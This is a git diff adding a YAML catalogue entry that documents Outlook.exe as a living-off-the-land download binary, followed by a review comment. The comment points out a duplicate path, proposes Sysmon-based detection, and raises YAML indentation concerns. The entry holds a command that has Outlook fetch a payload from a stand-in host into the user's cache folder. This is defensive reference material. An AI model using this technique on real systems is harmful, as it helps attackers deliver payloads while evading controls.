diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml
new file mode 100644
index 0000000..a7efcf3
--- /dev/null
+++ b/yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
+---
+Name: Outlook.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2022-11-08
+Commands:
+ - Command: Outlook.exe https://example.com/payload
+ Description: Downloads payload from remote server
+ Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
+ - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+ - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+Detection:
+ - IOC: Suspicious Office application internet/network traffic
+Acknowledgement:
+ - Person: Nir Chako (Pentera)
+ Handle: '@C_h4ck_0'
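Review bot: The Full_Path list in this hunk ends with a duplicate entry — `C:\Program Files\Microsoft Office\Office12\Outlook.exe` appears twice as the last two items — so one of them should be removed (if a distinct Office12 install path was intended, it has to be supplied instead of the repeat). The Detection section carries only the generic `IOC: Suspicious Office application internet/network traffic`, which is hard to turn into a rule; since the Usecase already names the cache folder, a more actionable entry would tie process-creation telemetry (Sysmon Event ID 1 / Security 4688) where the Outlook.exe command line contains a URL to file-creation events (Sysmon Event ID 11) from Outlook.exe into that folder, e.g. `  - IOC: Outlook.exe started with a URL on its command line, followed by file creation under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE`. The nesting under Commands, Full_Path and Acknowledgement is rendered here with a single leading space; that is presumably an artifact of how the page was collapsed, but the committed file should be confirmed to parse as YAML with consistent indentation, since a flattened `Description:` under `Commands:` would otherwise collide with the top-level key of the same name.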